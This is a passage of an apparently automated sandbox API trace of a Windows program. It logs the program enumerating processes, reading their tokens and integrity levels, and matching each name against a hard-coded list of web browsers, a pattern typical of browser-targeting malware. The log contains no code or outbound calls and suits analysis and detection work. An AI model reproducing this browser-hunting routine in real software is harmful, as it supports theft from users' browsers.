[0229.095] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0229.095] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x169450, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.095] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.095] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.095] GetLastError () returned 0x7a [0229.096] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.096] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.096] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.096] CloseHandle (hObject=0xb8) returned 1 [0229.096] CloseHandle (hObject=0xb4) returned 1 [0229.096] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0229.096] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0229.096] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0229.096] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0229.096] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0229.096] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0229.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0229.096] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.096] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.096] GetLastError () returned 0x7a [0229.096] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.096] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.096] CloseHandle (hObject=0xb8) returned 1 [0229.096] CloseHandle (hObject=0xb4) returned 1 [0229.096] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0229.096] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x165d08, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.096] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.096] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.096] GetLastError () returned 0x7a [0229.097] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.097] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.097] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.097] CloseHandle (hObject=0xb8) returned 1 [0229.097] CloseHandle (hObject=0xb4) returned 1 [0229.097] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0229.097] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0229.097] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0229.097] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0229.097] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0229.097] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0229.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0229.097] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.097] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.097] GetLastError () returned 0x7a [0229.097] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.097] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.097] CloseHandle (hObject=0xb8) returned 1 [0229.097] CloseHandle (hObject=0xb4) returned 1 [0229.097] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0229.097] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x165ea0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.097] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.097] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.097] GetLastError () returned 0x7a [0229.097] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.098] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.098] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.098] CloseHandle (hObject=0xb8) returned 1 [0229.098] CloseHandle (hObject=0xb4) returned 1 [0229.098] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0229.098] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0229.098] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0229.098] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0229.098] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0229.098] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0229.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0229.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0229.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0229.098] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.098] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.098] GetLastError () returned 0x7a [0229.098] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.098] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.098] CloseHandle (hObject=0xb8) returned 1 [0229.098] CloseHandle (hObject=0xb4) returned 1 [0229.098] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0229.098] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1664e8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.098] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.098] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.099] GetLastError () returned 0x7a [0229.099] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.099] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.099] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.099] CloseHandle (hObject=0xb8) returned 1 [0229.099] CloseHandle (hObject=0xb4) returned 1 [0229.099] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0229.099] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0229.099] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0229.099] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0229.099] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0229.099] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0229.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0229.099] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.099] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.099] GetLastError () returned 0x7a [0229.099] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.099] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.099] CloseHandle (hObject=0xb8) returned 1 [0229.099] CloseHandle (hObject=0xb4) returned 1 [0229.099] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0229.099] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1669e0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.099] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.099] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.099] GetLastError () returned 0x7a [0229.100] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.100] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.100] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.100] CloseHandle (hObject=0xb8) returned 1 [0229.100] CloseHandle (hObject=0xb4) returned 1 [0229.100] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0229.100] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0229.100] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0229.100] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0229.100] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0229.100] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0229.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0229.100] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.100] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.100] GetLastError () returned 0x7a [0229.100] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.100] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.100] CloseHandle (hObject=0xb8) returned 1 [0229.100] CloseHandle (hObject=0xb4) returned 1 [0229.100] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0229.100] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166af8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.100] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.100] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.100] GetLastError () returned 0x7a [0229.100] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.101] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.101] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.101] CloseHandle (hObject=0xb8) returned 1 [0229.101] CloseHandle (hObject=0xb4) returned 1 [0229.101] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0229.101] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0229.101] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0229.101] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0229.101] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0229.101] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0229.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0229.101] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.101] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.101] GetLastError () returned 0x7a [0229.101] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.101] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.101] CloseHandle (hObject=0xb8) returned 1 [0229.101] CloseHandle (hObject=0xb4) returned 1 [0229.101] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0229.101] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166c10, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.101] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.101] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.101] GetLastError () returned 0x7a [0229.101] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.102] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.102] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.102] CloseHandle (hObject=0xb8) returned 1 [0229.102] CloseHandle (hObject=0xb4) returned 1 [0229.102] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0229.102] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0229.102] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0229.102] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0229.102] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0229.102] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0229.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0229.102] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.102] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.102] GetLastError () returned 0x7a [0229.102] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.102] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.102] CloseHandle (hObject=0xb8) returned 1 [0229.102] CloseHandle (hObject=0xb4) returned 1 [0229.102] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0229.102] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166d50, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.102] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.102] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.102] GetLastError () returned 0x7a [0229.102] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, 